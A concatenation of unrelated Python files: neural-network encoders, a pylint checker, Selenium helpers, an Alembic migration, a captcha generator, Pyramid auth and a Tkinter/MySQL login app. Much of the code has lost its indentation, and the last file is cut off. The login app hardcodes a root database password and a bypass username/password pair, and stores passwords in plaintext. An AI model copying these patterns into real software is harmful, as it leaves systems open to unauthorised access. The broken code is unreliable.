    # (supports MySQL advanced search query syntax)
filtered_valuations = session.get_valuations(searchText="test")
print(f"found {len(filtered_valuations)} with the custom search text.")
for val in filtered_valuations:
print(val)
print("Done")
if __name__ == "__main__":
main()
|
python
|
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence
from torch import Tensor
from models.convolutional_rnn import Conv2dLSTM
class RNNEncoder(nn.Module):
def __init__(self, num_layers: int = 2, hidden_size: int = 512, action__chn: int = 64, speed_chn: int = 64):
super(RNNEncoder, self).__init__()
self.hidden_size = hidden_size
self.lstm = Conv2dLSTM(
in_channels=512 + action__chn + speed_chn, # Corresponds to input size
out_channels=hidden_size, # Corresponds to hidden size
kernel_size=3, # Int or List[int]
num_layers=num_layers,
bidirectional=True,
stride=2, # dropout=0.5, dilation=2,
batch_first=True)
self.action_cod = nn.Sequential(
nn.Linear(3, 8),
nn.ReLU(),
nn.Linear(8, 16)
)
self.action_conv = nn.Conv2d(
1, action__chn, kernel_size=(1, 1)
)
self.speed_cod = nn.Sequential(
nn.Linear(1, 8),
nn.ReLU(),
nn.Linear(8, 16)
)
self.speed_conv = nn.Conv2d(
1, speed_chn, kernel_size=(1, 1)
)
self.output_conv = nn.Conv2d(
hidden_size * 2 * 4, 512, kernel_size=(1, 1)
)
def forward(self, embedding, action, speed, embedding_length):
"""
Output dim: BxHiddenSize
"""
# Action (B, 3) => (B, 16) => (B, 1, 4, 4)
action_cod = self.action_cod(action).view(-1, 1, 4, 4)
# Action (B, 1, 4, 4) => (B, 64, 4, 4) => (B, 1, 64, 4, 4)
action_cod = self.action_conv(action_cod).unsqueeze(dim=1)
# Action (B, 1, 64, 4, 4) => (B, 4, 64, 4, 4)
action_cod = torch.cat((action_cod, action_cod, action_cod, action_cod), dim=1)
# Speed (B, 1) => (B, 16) => (B, 1, 4, 4)
speed_cod = self.speed_cod(speed).view(-1, 1, 4, 4)
# Speed (B, 1, 4, 4) => (B, 64, 4, 4) => (B, 1, 64, 4, 4)
speed_cod = self.speed_conv(speed_cod).unsqueeze(dim=1)
# Speed (B, 1, 64, 4, 4) => (B, 4, 64, 4, 4)
speed_cod = torch.cat((speed_cod, speed_cod, speed_cod, speed_cod), dim=1)
        # Cat embeddings, action and speed: (B, 4, 512, 4, 4) + (B, 4, 64, 4, 4)
        # + (B, 4, 64, 4, 4) => (B, 4, 640, 4, 4)
        action_emb = torch.cat((embedding, action_cod, speed_cod), dim=2)
x_pack = pack_padded_sequence(action_emb, embedding_length, batch_first=True)
# x_pack = pack_padded_sequence(action_emb, torch.ones((32)), batch_first=True)
h = None
y, h = self.lstm(x_pack, h)
# Output of lstm is stacked through all outputs (#outputs == #inputs), we get last output
y = self.output_conv(y.data.view(embedding.shape[0], -1, embedding.shape[-2], embedding.shape[-1]))
# y = y.data.view(embedding.shape)[:, -1, :, :, :].squeeze(dim=1)
# y = torch.mean(y.data.view(embedding.shape), dim=1)
return y, h
class VanillaRNNEncoder(nn.Module):
def __init__(self, num_layers: int = 2, hidden_size: int = 512, action__chn: int = 64, speed_chn: int = 64,
dropout: float = 0, bidirectional: bool = False):
super(VanillaRNNEncoder, self).__init__()
self.hidden_size = hidden_size
self.lstm = nn.LSTM(
input_size=8192 + action__chn + speed_chn,
hidden_size=hidden_size,
num_layers=num_layers,
bidirectional=bidirectional,
dropout=dropout,
batch_first=True
)
self.action_cod = nn.Sequential(
nn.Linear(3, 16),
nn.ReLU(),
nn.Linear(16, action__chn)
)
self.speed_cod = nn.Sequential(
nn.Linear(3, 16),
nn.ReLU(),
nn.Linear(16, speed_chn)
)
input_fc_size = 4 * (2 if bidirectional else 1) * hidden_size # times 4 because every sequence has length 4
self.output_fc = nn.Linear(input_fc_size, 512*4*4)
def forward(self, embedding, action, speed):
"""
Output dim: BxHiddenSize
"""
# Action (B, 3) => (B, action_chn) => (B, 1, action_chn)
action_cod = self.action_cod(action).unsqueeze(dim=1)
# Action (B, 1, action_chn) => (B, 4, action_chn)
action_cod = torch.cat((action_cod, action_cod, action_cod, action_cod), dim=1)
# Speed (B, 3) => (B, 1, speed_chn)
speed_cod = self.speed_cod(speed).unsqueeze(dim=1)
# Speed (B, 1, speed_chn) => (B, 4, speed_chn)
speed_cod = torch.cat((speed_cod, speed_cod, speed_cod, speed_cod), dim=1)
# (B, T, 512, 4, 4) => (B, T, 8192)
vis_embedding = embedding.view(embedding.shape[0], embedding.shape[1], -1)
# Cat embeddings and action (B, 4, 8192) + (B, 4, speed_chn) + (B, 4, action_chn) =>
# (B, 4, 8192 + speed_chn + action_chn)
action_emb = torch.cat((vis_embedding, action_cod, speed_cod), dim=2)
y, h = self.lstm(action_emb)
# (B, 4, (2 if bidirectional else 1)*hidden_size)
y = self.output_fc(y.reshape(embedding.shape[0], -1))
# y (B, 512, 4, 4)
return y.view(-1, embedding.shape[-3], embedding.shape[-2], embedding.shape[-1]), h
def freeze(self):
for param in self.parameters():
param.requires_grad = False
class SequenceRNNEncoder(nn.Module):
def __init__(self, num_layers: int = 2, hidden_size: int = 512, action__chn: int = 64, speed_chn: int = 64,
dropout: float = 0, bidirectional: bool = False):
super(SequenceRNNEncoder, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
        self.num_directions = 2 if bidirectional else 1
self.lstm = nn.LSTM(
input_size=8192 + action__chn + speed_chn,
hidden_size=hidden_size,
num_layers=num_layers,
bidirectional=bidirectional,
dropout=dropout,
batch_first=True
)
self.action_cod = nn.Sequential(
nn.Linear(3, 64),
nn.ReLU(),
nn.Linear(64, action__chn)
)
self.speed_cod = nn.Sequential(
nn.Linear(3, 64),
nn.ReLU(),
nn.Linear(64, speed_chn)
)
        input_fc_size = (2 if bidirectional else 1) * hidden_size  # applied per time step, so no sequence-length factor here
self.output_fc = nn.Linear(input_fc_size, 512*4*4)
def forward(self, embedding, action, speed, hidden=None):
"""
Output dim: BxHiddenSize
"""
# Action (B, 3) => (B, action_chn) => (B, 1, action_chn)
action_cod = self.action_cod(action).unsqueeze(dim=1)
# Action (B, 1, action_chn) => (B, 4, action_chn)
action_cod = torch.cat((action_cod, action_cod, action_cod, action_cod), dim=1)
# Speed (B, 3) => (B, 1, speed_chn)
speed_cod = self.speed_cod(speed).unsqueeze(dim=1)
# Speed (B, 1, speed_chn) => (B, 4, speed_chn)
speed_cod = torch.cat((speed_cod, speed_cod, speed_cod, speed_cod), dim=1)
# (B, T, 512, 4, 4) => (B, T, 8192)
vis_embedding = embedding.view(embedding.shape[0], embedding.shape[1], -1)
# Cat embeddings and action (B, 4, 8192) + (B, 4, speed_chn) + (B, 4, action_chn) =>
# (B, 4, 8192 + speed_chn + action_chn)
action_emb = torch.cat((vis_embedding, action_cod, speed_cod), dim=2)
y, h = self.lstm(action_emb, hidden)
# y shape (B, 4, hidden_size*bidirectional) => (4*B, hidden_size*bidirectional) => (4*B, 512*4*4)
y = self.output_fc(y.reshape(y.shape[0]*y.shape[1], -1))
return y.view(embedding.shape), h
def encode(self, embedding, action, speed, hidden=None):
# Action (B, 3) => (B, action_chn) => (B, 1, action_chn)
action_cod = self.action_cod(action).unsqueeze(dim=1)
# Speed (B, 3) => (B, 1, speed_chn)
speed_cod = self.speed_cod(speed).unsqueeze(dim=1)
# (B, T, 512, 4, 4) => (B, T, 8192)
vis_embedding = embedding.view(embedding.shape[0], embedding.shape[1], -1)
# Cat embeddings and action (B, 4, 8192) + (B, 4, speed_chn) + (B, 4, action_chn) =>
# (B, 4, 8192 + speed_chn + action_chn)
action_emb = torch.cat((vis_embedding, action_cod, speed_cod), dim=2)
y, h = self.lstm(action_emb, hidden)
return y, h
def init_hidden(self, batch_size, device='cpu'):
        h_shape = (self.num_directions * self.num_layers, batch_size, self.hidden_size)
h0 = torch.zeros(h_shape, requires_grad=False).to(device)
h1 = torch.zeros(h_shape, requires_grad=False).to(device)
return h0, h1
def freeze(self):
for param in self.parameters():
param.requires_grad = False
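# Shape sanity-check sketch (hedged: dummy tensors on CPU; T is fixed at 4
# because VanillaRNNEncoder's output_fc assumes sequences of length 4).
if __name__ == "__main__":
    enc = VanillaRNNEncoder()
    emb = torch.randn(2, 4, 512, 4, 4)  # (B, T, C, H, W) visual embeddings
    act = torch.randn(2, 3)             # (B, 3) action vector
    spd = torch.randn(2, 3)             # (B, 3); this encoder expects 3 speed features
    y, h = enc(emb, act, spd)
    print(y.shape)  # torch.Size([2, 512, 4, 4])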
|
python
|
# from .helpers.utils_ import *
# from .helpers.math_ import MathClass
# from .helpers.mm import MatrixMadness
from .main import *
|
python
|
from __future__ import print_function
from __future__ import absolute_import
import astroid
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers.utils import check_messages
MSGS = {
'E1113': ('Import inside a function from shining is not allowed',
'infunction-import',
'Import inside a function from shining is not allowed'),
'E1114': ('Imports from catkin are not allowed',
'catkin-import',
'Imports from catkin are not allowed'),
'E1115': ('Imports from src/calibration are not allowed',
'calibration-import',
'Imports from src/calibration are not allowed'),
'E1116': ('Imports from tests are not allowed',
'test-import',
'Imports from tests are not allowed'),
'E1117': ('Imports from sandboxes are not allowed',
'sandbox-import',
'Imports from sandboxes are not allowed'),
}
class CheckIllegalImports(BaseChecker):
"""
Check for
- imports inside functions
- imports from catkin
- imports from calibration scripts folder
"""
__implements__ = IAstroidChecker
name = 'shining_illegal_imports'
msgs = MSGS
priority = -2
options = ()
@check_messages(*list(MSGS.keys()))
def visit_import(self, node):
"""triggered when an import statement is seen"""
self._check_node(node.names[0][0], node)
@check_messages(*list(MSGS.keys()))
def visit_importfrom(self, node):
"""triggered when a from statement is seen"""
self._check_node(node.modname, node)
def _check_node(self, name, node):
if name.startswith('catkin_ws'):
self.add_message('catkin-import', node=node)
return
if name.startswith('calibration'):
self.add_message('calibration-import', node=node)
return
if not name.startswith('shining_software'):
return
module_name = name.split('.')[-1]
if module_name.startswith('test_'):
self.add_message('test-import', node=node)
if 'sandbox' in module_name:
self.add_message('sandbox-import', node=node)
if _is_in_function_import(node):
self.add_message('infunction-import', node=node)
def _is_in_function_import(node):
    '''
    Determine whether an import statement is nested inside a function.

    Module-level imports (optionally wrapped in try/except/finally or if
    blocks) are allowed; any other enclosing scope counts as in-function.

    :param node: astroid node
    :return: True if the import is inside a function
    '''
parent = node.parent
allowed_node_types = (astroid.TryExcept, astroid.TryFinally, astroid.If)
while not isinstance(parent, astroid.Module):
if not isinstance(parent, allowed_node_types):
return True
parent = parent.parent
return False
def register(linter):
"""required method to auto register this checker """
linter.register_checker(CheckIllegalImports(linter))
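# Enabling the checker (hedged sketch): pylint plugins are activated through the
# `load-plugins` option; the module name below is a placeholder for wherever this
# file actually lives on the Python path.
#
#   [MASTER]
#   load-plugins=shining_illegal_imports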
|
python
|
from selenium import webdriver
class Application:
def __init__(self):
self.wd = webdriver.Chrome(executable_path="C:\\chromedriver_win32\\chromedriver.exe")
self.wd.implicitly_wait(60)
def open_home_page(self):
wd = self.wd
wd.get("http://localhost/addressbook/addressbook/group.php")
def login(self, username, password):
wd = self.wd
self.open_home_page()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click()
def open_groups_page(self):
wd = self.wd
wd.find_element_by_link_text("grupy").click()
def create_group(self, group):
wd = self.wd
self.open_groups_page()
# init group creation
wd.find_element_by_name("new").click()
wd.find_element_by_name("group_name").click()
wd.find_element_by_name("group_name").clear()
wd.find_element_by_name("group_name").send_keys("grupa lesson1")
if not wd.find_element_by_xpath("//div[@id='content']/form/select//option[1]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select//option[1]").click()
wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys(group.name)
wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys(group.header)
wd.find_element_by_name("group_footer").click()
wd.find_element_by_name("group_footer").clear()
wd.find_element_by_name("group_footer").send_keys(group.footer)
# submit group creation
wd.find_element_by_name("submit").click()
self.return_to_group_page()
def return_to_group_page(self):
wd = self.wd
wd.find_element_by_link_text("group page").click()
def logout(self):
wd = self.wd
wd.find_element_by_link_text("Wyloguj się").click()
def destroy(self):
self.wd.quit()
|
python
|
"""protected and listed fields on Location
Revision ID: f8c342997aab
Revises: 5df6df91a533
Create Date: 2021-02-02 11:10:09.250494
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f8c342997aab'
down_revision = '5df6df91a533'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('location', sa.Column('listed', sa.Boolean(), nullable=True))
op.add_column('location', sa.Column('protected', sa.Boolean(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('location', 'protected')
op.drop_column('location', 'listed')
# ### end Alembic commands ###
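# Apply this migration with `alembic upgrade head`; roll it back with
# `alembic downgrade 5df6df91a533` (the down_revision above).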
|
python
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from click_captcha import ClickCaptcha
import fire
import sys
import codecs
# Re-wrap stdout so UTF-8 output works regardless of the console's default encoding
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
def main(app_name, count=300, enable_dummy_word=False, font_path="extend/msyh.ttf", word_list_file_path="extend/chinese_word.json"):
"""
功能: 生成点选验证码图片
:param app_name: str <应用名称>
:param count: int <文件数量>: 默认是300
:param enable_dummy_word: str <是否生成虚拟干扰的文字>: 默认是False
:param font_path: str <字体路径>: 默认为 `extend/msyh.ttf`
:param word_list_file_path: str <字典映射文件路径>: 默认为 `extend/chinese_word.json`
:return:None
"""
    # Create the captcha generator
    c = ClickCaptcha()
    c.font_settings(word_size=32, font_path=font_path, word_list_file_path=word_list_file_path)
    # Feature toggles
    c.enable_add_text = True  # draw the target text
    c.enable_dummy_word = enable_dummy_word  # add dummy distractor words
    # Batch-generate and save images plus labels
    c.template_path = "extend/exp.xml"
    c.save_img_dir = "app/{}/images_data/JPEGImages".format(app_name)
    c.save_label_dir = "app/{}/images_data/Annotations".format(app_name)
    c.create_image_by_batch(count)
print("Template is from {}".format(c.template_path))
print("Generate {} images on {}".format(count, c.save_img_dir))
print("Generate {} .xml label files on {}".format(count, c.save_label_dir))
if __name__ == '__main__':
fire.Fire(main)
|
python
|
from __future__ import absolute_import, print_function, unicode_literals
import sys
import binascii
import base64
from zope.interface import implementer
from pyramid.interfaces import IAuthenticationPolicy
from pyramid.authentication import CallbackAuthenticationPolicy, \
AuthTktAuthenticationPolicy
from pyshop.models import DBSession, User
from pyshop.compat import unicode
@implementer(IAuthenticationPolicy)
class AuthBasicAuthenticationPolicy(CallbackAuthenticationPolicy):
def __init__(self, callback=None):
self.callback = callback
def authenticated_userid(self, request):
auth = request.environ.get('HTTP_AUTHORIZATION')
try:
authmeth, auth = auth.split(' ', 1)
        except (AttributeError, ValueError):  # no header, or not enough values to unpack
return None
if authmeth.lower() != 'basic':
return None
try:
# Python 3's string is already unicode
auth = base64.b64decode(auth.strip())
except binascii.Error: # can't decode
return None
if not isinstance(auth, unicode):
auth = auth.decode('utf-8')
try:
login, password = auth.split(':', 1)
except ValueError: # not enough values to unpack
return None
if User.by_credentials(DBSession(), login, password):
return login
return None
def unauthenticated_userid(self, request):
return self.authenticated_userid(request)
def remember(self, request, principal, **kw):
return []
def forget(self, request):
return []
@implementer(IAuthenticationPolicy)
class RouteSwitchAuthPolicy(CallbackAuthenticationPolicy):
    def __init__(self, secret='key', callback=None):
try:
authtk = AuthTktAuthenticationPolicy(secret,
callback=callback,
hashalg='sha512')
except TypeError:
# pyramid < 1.4
authtk = AuthTktAuthenticationPolicy(secret, callback=callback)
        self.impl = {'basic': AuthBasicAuthenticationPolicy(callback=callback),
                     'tk': authtk}
self.callback = callback
def get_impl(self, request):
        if request.matched_route and request.matched_route.name in (
                'list_simple', 'show_simple',
                'show_release_file', 'show_external_release_file',
                'upload_releasefile'):
return self.impl['basic']
return self.impl['tk']
def authenticated_userid(self, request):
impl = self.get_impl(request)
return impl.authenticated_userid(request)
def unauthenticated_userid(self, request):
impl = self.get_impl(request)
return impl.unauthenticated_userid(request)
def remember(self, request, principal, **kw):
impl = self.get_impl(request)
return impl.remember(request, principal, **kw)
def forget(self, request, *args, **kw):
impl = self.get_impl(request)
return impl.forget(request, *args, **kw)
|
python
|
import indicators.indicator_settings as indicator_settings
settings = indicator_settings.global_settings['VAR_LB']
table_name = "VAR_LB"
for i in list(settings.keys()):
table_name += "_" + str(settings[i])
settings.update(
{
'db_path' : indicator_settings.indicators_root_path + "/var_lb/var_lb_db.sqlite",
'table_list' : (
['timestamp', 'INT', 'NOT NULL'],
['close', 'FLOAT(5,4)' , 'NOT NULL'],
['apriori_var', 'FLOAT(5,4)' , 'NOT NULL'],
['aposteriori_mean', 'FLOAT(5,4)' , 'NOT NULL'],
['labels', 'INT' , 'NOT NULL'],
),
'update_tdiff' : 4096,
'table_name' : table_name
}
)
|
python
|
from tkinter import *
from tkinter import ttk
from PIL import Image, ImageTk
from tkinter import messagebox
import mysql.connector
from mymain import AAS
def main():
win = Tk()
app = Login_Window(win)
win.mainloop()
class Login_Window:
def __init__(self, root):
self.root = root
self.root.title("Login")
self.root.geometry("1550x800+0+0")
self.bg = ImageTk.PhotoImage(file=r"img\black.jpg")
lbl_bg = Label(self.root, image=self.bg)
lbl_bg.place(x=0, y=0, relwidth=1, relheight=1)
frame = Frame(self.root, bg="black")
frame.place(x=610, y=170, width=340, height=450)
img1 = Image.open( r"img\login1.jpg")
img1 = img1.resize((100, 100), Image.ANTIALIAS)
self.photoimage1 = ImageTk.PhotoImage(img1)
lblimg1 = Label(image=self.photoimage1, bg="black", borderwidth=0)
lblimg1.place(x=730, y=175, width=100, height=100)
get_str = Label(frame, text="Get Started", font=("times new roman", 20, "bold"), fg="white", bg="black")
get_str.place(x=95, y=100)
# Label
username = lbl = Label(frame, text="Username", font=("times new roman", 15, "bold"), fg="white", bg="black")
username.place(x=70, y=155)
self.txtuser = ttk.Entry(frame, font=("times new roman", 15, "bold"))
self.txtuser.place(x=40, y=180, width=270)
password = lbl = Label(frame, text="Password", font=("times new roman", 15, "bold"), fg="white", bg="black")
password.place(x=70, y=225)
self.txtpass = ttk.Entry(frame, font=("times new roman", 15, "bold"))
self.txtpass.place(x=40, y=250, width=270)
# ======Icon Images====================
img1p = Image.open(r"img\login.png")
img1p= img1p.resize((25, 25), Image.ANTIALIAS)
self.photoimage1p = ImageTk.PhotoImage(img1p)
lbling1 = Label(image=self.photoimage1p, bg="black", borderwidth=0)
lbling1.place(x=650, y=323, width=25, height=25)
img2 = Image.open(r"img\password.png")
img2 = img2.resize((25, 25), Image.ANTIALIAS)
self.photoimage2 = ImageTk.PhotoImage(img2)
lbling1 = Label(image=self.photoimage2, bg="black", borderwidth=0)
lbling1.place(x=650, y=395, width=25, height=25)
# LoginButton
loginbtn = Button(frame, command=self.login, text="Login", font=("times new roman", 15, "bold"),
bd=3, relief=RIDGE, fg="white", bg="red", activeforeground="white", activebackground="red")
loginbtn.place(x=110, y=300, width=120, height=35)
# RegisterButton
registerbtn = Button(frame, text="New User Register", command=self.register_window, font=(
"times new roman", 10, "bold"), borderwidth=0, relief=RIDGE, fg="white", bg="black", activeforeground="white", activebackground="black")
registerbtn.place(x=15, y=350, width=160)
# forgetpasswordbutton
forgetpassbtn = Button(frame, text="Forget Password", command=self.forget_password_window, font=(
"times new roman", 10, "bold"), borderwidth=0, relief=RIDGE, fg="white", bg="black", activeforeground="white", activebackground="black")
forgetpassbtn.place(x=10, y=370, width=160)
def register_window(self):
self.new_window = Toplevel(self.root)
self.app = Register(self.new_window)
def login(self):
if self.txtuser.get() == "" or self.txtpass.get() == "":
messagebox.showerror("Error", "All fields required")
        elif self.txtuser.get() == "kapu" and self.txtpass.get() == "ashu":
messagebox.showinfo("Success", "Welcome")
else:
conn = mysql.connector.connect(
host="localhost", user="root", password="Ektapalak25", database="face_recognizer")
my_cursor = conn.cursor()
my_cursor.execute("select * from register where email=%s and pass=%s", (
self.txtuser.get(),
self.txtpass.get()
))
row = my_cursor.fetchone()
            if row is None:
messagebox.showerror("Error", "Invalid Username and Password")
else:
                open_main = messagebox.askyesno("Yes No", "Access only admin")
                if open_main:
                    self.new_window = Toplevel(self.root)
                    self.app = AAS(self.new_window)
                else:
                    return
conn.commit()
conn.close()
# ==================Reset Password==================================
def reset_pass(self):
if self.combo_security_Q.get() == "Select":
messagebox.showerror("Error", "Select security question")
elif self.txt_security.get() == "":
messagebox.showerror("Error", "Please enter the answer")
elif self.txt_newpass.get() == "":
messagebox.showerror( "Error", "Please enter the new password")
else:
conn = mysql.connector.connect(host="localhost", user="root", password="Ektapalak25", database="face_recognizer")
my_cursor = conn.cursor()
query = ("Select * from register where email=%s and securityQ=%s and securityA=%s")
value = (self.txtuser.get(),
self.combo_security_Q.get(), self.txt_security.get())
my_cursor.execute(query, value)
row = my_cursor.fetchone()
            if row is None:
messagebox.showerror("Error", "Please enter the correct answer")
else:
query = ("Update register set pass=%s where email=%s")
value = (self.txt_newpass.get(), self.txtuser.get())
my_cursor.execute(query, value)
conn.commit()
conn.close()
messagebox.showinfo("Info", "Your password has been reset successfully")
self.root2.destroy()
# ==================Forget Password Window================================
def forget_password_window(self):
if self.txtuser.get() == "":
messagebox.showerror("Error", "Please enter the Email address to reset password")
else:
conn = mysql.connector.connect(host="localhost", user="root", password="Ektapalak25", database="face_recognizer")
my_cursor = conn.cursor()
query = ("Select * from register where email=%s")
value = (self.txtuser.get(),)
my_cursor.execute(query, value)
row = my_cursor.fetchone()
            if row is None:
messagebox.showerror("Error", "Please enter the registered username")
else:
conn.close()
self.root2 = Toplevel()
self.root2.title("Forget Password")
self.root2.geometry("340x450+610+170")
l = Label(self.root2, text="Forget Password", font=("times new roman", 20, "bold"), fg="red", bg="white")
l.place(x=0, y=10, relwidth=1)
security_Q = Label(self.root2, text="Select security question", font=("times new roman", 15, "bold"), bg="white", fg="black")
security_Q.place(x=50, y=80)
self.combo_security_Q = ttk.Combobox(self.root2, font=("times new roman", 15, "bold"), state="readonly")
self.combo_security_Q["values"] = ("Select", "Your birth place", "Your best friend name", "Your pet name")
self.combo_security_Q.place(x=50, y=110, width=250)
self.combo_security_Q.current(0)
security_A = Label(self.root2, text="Security Answer", font=("times new roman", 15, "bold"), bg="white", fg="black")
security_A.place(x=50, y=150)
self.txt_security = ttk.Entry(self.root2, font=("times new roman", 15, "bold"))
self.txt_security.place(x=50, y=180, width=250)
new_password = Label(self.root2, text="New Password", font=("times new roman", 15, "bold"), bg="white", fg="black")
new_password.place(x=50, y=220)
self.txt_newpass = ttk.Entry(
self.root2, font=("times new roman", 15, "bold"))
self.txt_newpass.place(x=50, y=250, width=250)
btn = Button(self.root2, text="Reset",command=self.reset_pass ,font=( "times new roman", 15, "bold"), fg="white", bg="green")
btn.place(x=100, y=290)
class Register:
def __init__(self, root):
self.root = root
self.root.title("Register")
self.root.geometry("1600x900+0+0")
# ===========================variables==================================
self.var_fname = StringVar()
self.var_lname = StringVar()
self.var_contact = StringVar()
self.var_email = StringVar()
self.var_securityQ = StringVar()
self.var_SecurityA = StringVar()
self.var_pass = StringVar()
self.var_confpass = StringVar()
self.var_check = IntVar()
# ===============bg image================
self.bg = ImageTk.PhotoImage(file=r"img\black.jpg")
bg_lbl = Label(self.root, image=self.bg)
bg_lbl.place(x=0, y=0, relwidth=1, relheight=1)
# ===============left image================
self.bg1 = ImageTk.PhotoImage(file=r"img\register.gif")
left_lbl = Label(self.root, image=self.bg1)
left_lbl.place(x=50, y=100, width=470, height=550)
# ===============main frame=================
frame = Frame(self.root, bg="white")
frame.place(x=520, y=100, width=800, height=550)
register_lbl = Label(frame, text="REGISTER HERE", font=(
"times new roman", 20, "bold"), fg="darkgreen", bg="white")
register_lbl.place(x=20, y=20)
# ==============label and entry==============
# =============row1
fname = Label(frame, text="First Name", font=("times new roman", 15, "bold"), bg="white")
fname.place(x=50, y=100)
self.fname_entry = ttk.Entry( frame, textvariable=self.var_fname, font=("times new roman", 15, "bold"))
self.fname_entry.place(x=50, y=130, width=250)
l_name = Label(frame, text="Last Name", font=("times new roman", 15, "bold"), bg="white", fg="black")
l_name.place(x=370, y=100)
self.txt_lname = ttk.Entry(frame, textvariable=self.var_lname, font=("times new roman", 15))
self.txt_lname.place(x=370, y=130, width=250)
# ===============row2
contact = Label(frame, text="Contact No", font=("times new roman", 15, "bold"), bg="white", fg="black")
contact.place(x=50, y=170)
self.txt_contact = ttk.Entry(
frame, textvariable=self.var_contact, font=("times new roman", 15))
self.txt_contact.place(x=50, y=200, width=250)
email = Label(frame, text=("Email"), font=( "times new roman", 15, "bold"), bg="white", fg="black")
email.place(x=370, y=170)
self.txt_email = ttk.Entry(
frame, textvariable=self.var_email, font=("times new roman", 15))
self.txt_email.place(x=370, y=200, width=250)
# ================row3
security_Q = Label(frame, text="Select security question", font=( "times new roman", 15, "bold"), bg="white", fg="black")
security_Q.place(x=50, y=240)
self.combo_security_Q = ttk.Combobox(frame, textvariable=self.var_securityQ, font=("times new roman", 15, "bold"), state="readonly")
self.combo_security_Q["values"] = ("Select", "Your birth place", "Your best friend name", "Your pet name")
self.combo_security_Q.place(x=50, y=270, width=250)
self.combo_security_Q.current(0)
security_A = Label(frame, text="Security Answer", font=("times new roman", 15, "bold"), bg="white", fg="black")
security_A.place(x=370, y=240)
self.txt_security = ttk.Entry(
frame, textvariable=self.var_SecurityA, font=("times new roman", 15))
self.txt_security.place(x=370, y=270, width=250)
# =================row4
pswd = Label(frame, text="Password", font=("times new roman", 15, "bold"), bg="white", fg="black")
pswd.place(x=50, y=310)
self.txt_pswd = ttk.Entry(
frame, textvariable=self.var_pass, font=("times new roman", 15))
self.txt_pswd.place(x=50, y=340, width=250)
confirm_pswd = Label(frame, text="Confirm password", font=("times new roman", 15, "bold"), bg="white", fg="black")
confirm_pswd.place(x=370, y=310)
self.txt_confirm_pswd = ttk.Entry(
frame, textvariable=self.var_confpass, font=("times new roman", 15))
self.txt_confirm_pswd.place(x=370, y=340, width=250)
# ================check button=====================
checkbtn = Checkbutton(frame, variable=self.var_check, text="I Agree To The Terms & Conditions", font=("times new roman", 12, "bold"), onvalue=1, offvalue=0)
checkbtn.place(x=50, y=380)
# ===========================buttons===================================
img = Image.open("img\att2.jfif")
img = img.resize((200, 50), Image.ANTIALIAS)
self.photoimage = ImageTk.PhotoImage(img)
b1 = Button(frame, image=self.photoimage, command=self.register_data,borderwidth=0, cursor="hand2", font=("times new roman", 15, "bold"), fg="white")
b1.place(x=10, y=420, width=200)
        img1l = Image.open(r"img\bg2.jfif")
img1l = img1l.resize((200, 50), Image.ANTIALIAS)
self.photoimage1l = ImageTk.PhotoImage(img1l)
b1 = Button(frame, image=self.photoimage1l, borderwidth=0,cursor="hand2", font=("times new roman", 15, "bold"), fg="white")
b1.place(x=330, y=420, width=200)
# =================function declaration=======================
def register_data(self):
        if self.var_fname.get() == "" or self.var_email.get() == "" or self.var_securityQ.get() == "Select":
messagebox.showerror("Error", "All fields are required")
elif self.var_pass.get() != self.var_confpass.get():
messagebox.showerror("Error", "password & confirm password must be same")
elif self.var_check.get() == 0:
messagebox.showerror("Error", "Please agree our terms and conditions")
else:
            conn = mysql.connector.connect(host="localhost", user="root", password="Ektapalak25", database="face_recognizer")
my_cursor = conn.cursor()
query = ("select * from register where email=%s")
value = (self.var_email.get(),)
my_cursor.execute(query, value)
row = my_cursor.fetchone()
            if row is not None:
messagebox.showerror("Error", "User already exists, try another email")
else:
my_cursor.execute("insert into register values(%s,%s,%s,%s,%s,%s,%s)", (
self.var_fname.get(),
self.var_lname.get(),
self.var_contact.get(),
self.var_email.get(),
self.var_securityQ.get(),
self.var_SecurityA.get(),
self.var_pass.get()
))
conn.commit()
conn.close()
messagebox.showinfo("Success", "Register Successfully")
if __name__ == "__main__":
main()
|
python
|
import pytest
from tests.compiler import compile_base
from thinglang.compiler.errors import SelfInStaticMethod
SELF_USE_IN_STATIC_METHOD = '''
thing Program
has number n1
static does something
{}
'''
def test_direct_self_use_in_static_function():
with pytest.raises(SelfInStaticMethod):
compile_base(SELF_USE_IN_STATIC_METHOD.format('return self'))
with pytest.raises(SelfInStaticMethod):
compile_base(SELF_USE_IN_STATIC_METHOD.format('Console.print(self)'))
def test_self_dereference_in_static_function():
with pytest.raises(SelfInStaticMethod):
compile_base(SELF_USE_IN_STATIC_METHOD.format('self.n1'))
|
python
|
# -*- coding: utf-8 -*-
import struct
SIZE = "I"
SIZEB = "B"
def stringToByteList(txt):
byteList = list()
for to in range(0, len(txt), 8):
byteList.append(int(txt[to:to + 8], 2))
return byteList
def byteListToString(byteList):
txt = ""
for element in byteList:
txt = txt + bin(element)[2:].zfill(8)
return txt
def occurrenceToByteList(occurrence):
byteList = list()
for key in occurrence:
byteList.append(ord(key))
byteList.append(occurrence[key])
return byteList
def byteListToOccurrence(byteList):
occurrence = dict()
for index in range(0, len(byteList), 2):
occurrence[chr(byteList[index])] = byteList[index + 1]
return occurrence
def packData(output, occurrence):
pack = fillZeros(output)
sByte = stringToByteList(pack["output"])
oByte = occurrenceToByteList(occurrence)
sBytel = len(sByte)
oBytel = len(oByte)
buf = struct.pack(SIZEB, pack["filled"])
buf = buf + struct.pack(SIZE, sBytel)
buf = buf + struct.pack(SIZE, oBytel)
buf = buf + struct.pack(SIZEB * sBytel, *sByte)
